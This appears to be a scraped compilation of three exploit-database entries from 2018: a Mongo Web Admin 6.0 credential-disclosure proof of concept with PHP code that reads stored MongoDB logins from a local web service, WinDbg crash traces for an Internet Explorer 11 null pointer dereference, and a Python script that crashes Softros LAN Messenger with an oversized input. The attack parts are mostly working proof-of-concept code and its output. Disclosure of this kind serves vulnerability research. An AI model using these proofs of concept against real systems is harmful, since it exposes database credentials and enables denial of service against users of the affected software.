# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mongoadmin.org/
# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe
# Version: 6.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name
# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin

GET /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,* /*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Cookie: PHPSESSID=npbo6p4par2h1flfvc4lv04ok4; mongo-web-admin-session=bvf9kg9nod2gttd6rstk2l4q30
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 16:27:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 490
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

header ('Content-type: text/html; charset=UTF-8');

$urlemiz= "http://127.0.0.1:6376/webservice/Data/";
$y="connections.json";
$jsonveri = file_get_contents($urlemiz.$y);
$ver = json_decode($jsonveri,true);
echo "<pre>\n";
print_r($ver);
echo "\n</pre>";
/**
Array
(
    [0] => Array
        (
            [id] => 0.81395000 1342373198
            [name] => Default
            [host] => localhost
            [port] => 27017
            [user] => user1
            [password] => pass1
        )

    [1] => Array
        (
            [id] => 0.54691200 1541333748
            [name] => New connection
            [host] => localhost
            [port] => 27017
            [user] => user2
            [password] => pass2
        )

)
HireHackking 
# Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-11-03
# Vendor: Microsoft Corporation
# Product web page: https://www.microsoft.com
# Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949))
#                   11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949))
#                   11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198))
#                   11.0.9600.17843 (Update Versions: 11.0.20 (KB3058515))
# Tested on: Microsoft Windows 10 (EN) (64bit)
#            Microsoft Windows 7 SP1 (EN) (32/64bit)
# Affected module: mshtml.dll
# Affected functions: Tree::Notify_InvalidateDisplay
#                     CTreeNode::EnsureNoDependentLayoutFixup
#                     CMarkup::BuildDescendentsList
# References:
# Advisory ID: ZSL-2018-5499
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5499.php

# Desc: The crash is caused due to a NULL pointer dereference access violation inside the
# 'Tree::Notify_InvalidateDisplay' function while parsing malformed DOM elements. The issue
# was discovered using the Domato fuzzer.

# Microsoft Internet Explorer 11 Tree::Notify_InvalidateDisplay Null Pointer Dereference
# PoC: https://www.zeroscience.mk/codes/msie11_nullptr_fuzz-33.html.rar

# Trace:
################################################################################################

(e9c.142c): Access violation - code c0000005 (!!! second chance !!!)
eax=21b9efa0 ebx=21b9efac ecx=21b9efa0 edx=00000000 esi=00000000 edi=187a8fc4
eip=63f04e48 esp=08c39ab8 ebp=08c39ac4 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43:
63f04e48 f70600010000    test    dword ptr [esi],100h ds:002b:00000000=????????
0:007> k
 # ChildEBP RetAddr  
00 08c39ac4 63a52ddf MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43
01 08c39bd0 63a523c5 MSHTML!CMarkup::InsertElementInternalNoInclusions+0x1f3
02 08c39bf8 63a529d3 MSHTML!CMarkup::InsertElementInternal+0x3d
03 08c39c38 63a52a54 MSHTML!CDoc::InsertElement+0x9b
04 08c39cf8 63a3ca96 MSHTML!InsertDOMNodeHelper+0x154
05 08c39db8 63a3cc73 MSHTML!CElement::InsertBeforeHelper+0x22b
06 08c39ddc 63a3cff3 MSHTML!CElement::InsertBefore+0x2f
07 08c39e70 63a3cf06 MSHTML!CElement::Var_appendChild+0xb3
08 08c39ea0 6de5e6ee MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x75
09 08c39f08 6de582cd jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x101
0a 08c39f50 6df0833d jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0b 08c39f74 6dffc483 jscript9!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutCallI> >+0x53
0c 08c39fa0 6dffc45c jscript9!Js::InterpreterStackFrame::OP_ProfileReturnTypeCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutCallI> >+0x1c
0d 08c39fc0 6dffc428 jscript9!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallI<Js::OpLayoutCallI>+0x2a
0e 08c3a1b0 6dee5371 jscript9!Js::InterpreterStackFrame::Process+0x4e90
0f 08c3a1e8 6dee53d0 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
10 08c3a3d8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x39dc
11 08c3bde4 0d8c0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce
WARNING: Frame IP not in any known module. Following frames may be wrong.
12 08c3bdf0 6de5c22d 0xd8c0fd9
13 08c3bfe8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x1940
14 08c3c104 0d8c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce
15 08c3c110 6de582cd 0xd8c0fe1
16 08c3c158 6de58a05 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
17 08c3c1cc 6de5893f jscript9!Js::JavascriptFunction::CallRootFunction+0xc1
18 08c3c214 6de588bf jscript9!ScriptSite::CallRootFunction+0x42
19 08c3c244 6de5d0f0 jscript9!ScriptSite::Execute+0x61
1a 08c3c2a0 6de5d02c jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb
1b 08c3c2b8 63a362a4 jscript9!ScriptEngineBase::Execute+0x1c
1c 08c3c374 63a3613e MSHTML!CListenerDispatch::InvokeVar+0x15a
1d 08c3c3a0 63a35e01 MSHTML!CListenerDispatch::Invoke+0x6d
1e 08c3c440 6398e7d2 MSHTML!CEventMgr::_InvokeListeners+0x1fe
1f 08c3c5b4 639d2863 MSHTML!CEventMgr::Dispatch+0x3bb
20 08c3c5dc 63eadc91 MSHTML!CEventMgr::DispatchEvent+0x90
21 08c3c5f0 63e94da9 MSHTML!CSVGElement::Fire_SVGLoad+0x46
22 08c3c608 63eadc43 MSHTML!CSVGSVGElement::Fire_SVGLoad+0x19
23 08c3c620 63dafdc1 MSHTML!CSVGElement::Fire_SVGLoad_Async_Handler+0x23
24 08c3c64c 6398f25c MSHTML!CAsyncEventQueue::DispatchAllEvents+0x41c3ea
25 08c3c6a0 771462fa MSHTML!GlobalWndProc+0x2d3
26 08c3c7bc 00a3ee48 user32!InternalCallWinProc+0x23
27 08c3c7c0 076bafe0 0xa3ee48
28 08c3c7c4 00000000 0x76bafe0


################################################################################################

(15e4.1634): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=22a98fa0 ecx=00000061 edx=000000c1 esi=22a96fac edi=0969c384
eip=63916681 esp=0969c1d8 ebp=0969c200 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CMarkup::BuildDescendentsList+0x158:
63916681 81b828030000609ffd63 cmp dword ptr [eax+328h],offset MSHTML!__vtguard (63fd9f60) ds:002b:00000328=????????
0:008> k
 # ChildEBP RetAddr  
00 0969c200 6384f86d MSHTML!CMarkup::BuildDescendentsList+0x158
01 0969c350 639b1597 MSHTML!CMarkup::Notify+0x17b
02 0969c3b8 639b1431 MSHTML!CMarkup::OnLoadStatusDone+0x14b
03 0969c3cc 639b078b MSHTML!CMarkup::OnLoadStatus+0xfa
04 0969c810 639aa322 MSHTML!CProgSink::DoUpdate+0x4c7
05 0969c81c 6382e541 MSHTML!CProgSink::OnMethodCall+0x12
06 0969c868 6382de4a MSHTML!GlobalWndOnMethodCall+0x16d
07 0969c8b8 771462fa MSHTML!GlobalWndProc+0x2e5
08 0969c8e4 77146d3a user32!InternalCallWinProc+0x23
09 0969c95c 771477c4 user32!UserCallWinProcCheckWow+0x109
0a 0969c9bc 7714788a user32!DispatchMessageWorker+0x3b5
0b 0969c9cc 6ce3f7c8 user32!DispatchMessageW+0xf
0c 0969fb98 6cf8f738 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0d 0969fc58 7732e61c IEFRAME!LCIETab_ThreadProc+0x37b
0e 0969fc70 72f93991 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0f 0969fca8 764b336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
10 0969fcb4 778a9902 kernel32!BaseThreadInitThunk+0xe
11 0969fcf4 778a98d5 ntdll!__RtlUserThreadStart+0x70
12 0969fd0c 00000000 ntdll!_RtlUserThreadStart+0x1b

################################################################################################

FAILURE_BUCKET_ID:  NULL_CLASS_PTR_READ_AVRF_c0000005_MSHTML.dll!Tree::Notify_InvalidateDisplay
BUCKET_ID:  APPLICATION_FAULT_NULL_CLASS_PTR_READ_INVALID_POINTER_READ_AFTER_CALL_AVRF_MSHTML!Tree::Notify_InvalidateDisplay+19
FAILURE_EXCEPTION_CODE:  c0000005
FAILURE_IMAGE_NAME:  MSHTML.dll

--

(d98.d24): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Tree::Notify_InvalidateDisplay+0x1f:
555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=????????
1:022:x86> r
eax=00000000 ebx=204d6b40 ecx=10ba9500 edx=00000001 esi=204d6b40 edi=10ba9500
eip=555ae81a esp=0535d3f8 ebp=0535d454 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::Notify_InvalidateDisplay+0x1f:
555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=????????
1:022:x86> kb
 # ChildEBP RetAddr  Args to Child              
00 0535d400 55d882b4 00000000 19540000 148ca2d0 MSHTML!Tree::Notify_InvalidateDisplay+0x1f
01 0535d454 55d547e9 148ca2a0 0535d4c8 204c7770 MSHTML!Tree::Notify_TextRangeHighlighted+0x140
02 0535d4ac 55d55337 204c7770 204c7720 00000000 MSHTML!CSelectionRenderingServiceProvider::InvalidateSegment+0x148
03 0535d4ec 5582e569 148ca270 00000001 19070980 MSHTML!CSelectionRenderingServiceProvider::PrivateClearSegment+0x106
04 0535d504 556a24db 049c8000 148ca270 00000200 MSHTML!CDoc::RemoveSegment+0x39
05 0535d52c 5529fe11 0535d55c 5529fdd0 11ef40b0 MSHTML!CSelTrackServices::ClearSelection+0x401d83
06 0535d548 555e656d 00000000 00000001 00000001 MSHTML!CSelectTracker::BecomeDormant+0x41
07 0535d568 555f8288 00000000 00000001 00000001 MSHTML!CSelectionManager::HibernateTracker+0x2b
08 0535d590 55f054b1 00000000 00000001 0000000c MSHTML!CSelectionManager::EnsureDefaultTrackerPassive+0x51
09 0535d5c8 557f8eda 0535d630 555e9c37 00000000 MSHTML!CSelectionManager::DoPendingElementExit+0x429
0a 0535d5d0 555e9c37 00000000 5555c8fa 00000000 MSHTML!CSelectionManager::DoPendingTasks+0x20f28e
0b 0535d5d8 5555c8fa 00000000 1b034680 00000000 MSHTML!CSelectionManager::EnsureEditContext+0x20
0c 0535d630 5555c80e 0000000c 00000000 00000000 MSHTML!CSelectionManager::Notify+0x7c
0d 0535d654 5555c7a5 1b034680 0000000c 00000000 MSHTML!CHTMLEditor::Notify+0x51
0e 0535d670 5555c5fd 1b034680 0000000c 00000000 MSHTML!CHTMLEditorProxy::Notify+0x35
0f 0535d698 555e7edb 0000000c 00000000 00000000 MSHTML!CDoc::NotifySelection+0x4f
10 0535d92c 555e5c91 00000000 555e5c50 555e5c50 MSHTML!CCaret::UpdateScreenCaret+0xbe
11 0535d940 555baffb 10b7d8f0 049c8000 0000011f MSHTML!CCaret::DeferredUpdateCaret+0x41
12 0535d9bc 555bb394 d836afd1 00008002 00000000 MSHTML!GlobalWndOnMethodCall+0x21b
13 0535da08 75a9be6b 00190984 00008002 00000000 MSHTML!GlobalWndProc+0xe4
14 0535da34 75a9833a 555bb2b0 00190984 00008002 USER32!_InternalCallWinProc+0x2b
15 0535db1c 75a97bee 555bb2b0 00000000 00008002 USER32!UserCallWinProcCheckWow+0x3aa
16 0535db98 75a979d0 b9836150 0535fd34 5643485f USER32!DispatchMessageWorker+0x20e
17 0535dba4 5643485f 0535dbe0 00e4b470 008ff230 USER32!DispatchMessageW+0x10
18 0535fd34 56433e60 0535fe00 56433a50 00e433e8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x46f
19 0535fdf4 5bdcb61c 00e4b470 0535fe18 56488ce0 IEFRAME!LCIETab_ThreadProc+0x410
1a 0535fe0c 5bd6e6cd 00e433e8 5bd6e640 5bd6e640 msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1b 0535fe44 77648484 0089c570 77648460 f7de4b1c IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
1c 0535fe58 77a7305a 0089c570 005c205f 00000000 KERNEL32!BaseThreadInitThunk+0x24
1d 0535fea0 77a7302a ffffffff 77a8ec8b 00000000 ntdll_77a10000!__RtlUserThreadStart+0x2f
1e 0535feb0 00000000 5bd6e640 0089c570 00000000 ntdll_77a10000!_RtlUserThreadStart+0x1b
1:022:x86> .exr -1
ExceptionAddress: 555ae81a (MSHTML!Tree::Notify_InvalidateDisplay+0x0000001f)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000418
Attempt to read from address 00000418
1:022:x86> ub
MSHTML!Tree::Notify_InvalidateDisplay+0x7:
555ae802 f7460800001000  test    dword ptr [esi+8],100000h
555ae809 756e            jne     MSHTML!Tree::Notify_InvalidateDisplay+0x7e (555ae879)
555ae80b 8bc6            mov     eax,esi
555ae80d 8b38            mov     edi,dword ptr [eax]
555ae80f 85ff            test    edi,edi
555ae811 7462            je      MSHTML!Tree::Notify_InvalidateDisplay+0x7a (555ae875)
555ae813 8bcf            mov     ecx,edi
555ae815 e8b664d5ff      call    MSHTML!CElement::GetMarkupPtr (55304cd0)
1:022:x86> 
MSHTML!TSmartPointer<CFilterNativeInfo>::operator&+0x12:
555ae7f3 50              push    eax
555ae7f4 e8a7f9c6ff      call    MSHTML!CFilterNativeInfo::Release (5521e1a0)
555ae7f9 ebf4            jmp     MSHTML!TSmartPointer<CFilterNativeInfo>::operator&+0xe (555ae7ef)
MSHTML!Tree::Notify_InvalidateDisplay:
555ae7fb 8bff            mov     edi,edi
555ae7fd 53              push    ebx
555ae7fe 56              push    esi
555ae7ff 8bf1            mov     esi,ecx
555ae801 57              push    edi
HireHackking 
# Exploit Title: Softros LAN Messenger 9.2 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-02
# Vendor Homepage: https://messenger.softros.com/
# Software Link: https://messenger.softros.com/downloads/
# Tested Version: 9.2
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1

# Steps to produce the crash:
# 1.- Run python code: Softros_LAN_Messenger_v9.2.py
# 2.- Open msn.txt and copy content to clipboard
# 2.- Open Softros LAN Messenger
# 3.- Select "Logging"
#  4.- Locate "Log Files Location " 
# 5.- Select "Custom Location" and Paste ClipBoard
# 6.- Click on "OK"
# 7.- Crashed

cod = "\x41" * 2000

f = open('msn.txt', 'w')
f.write(cod)
f.close()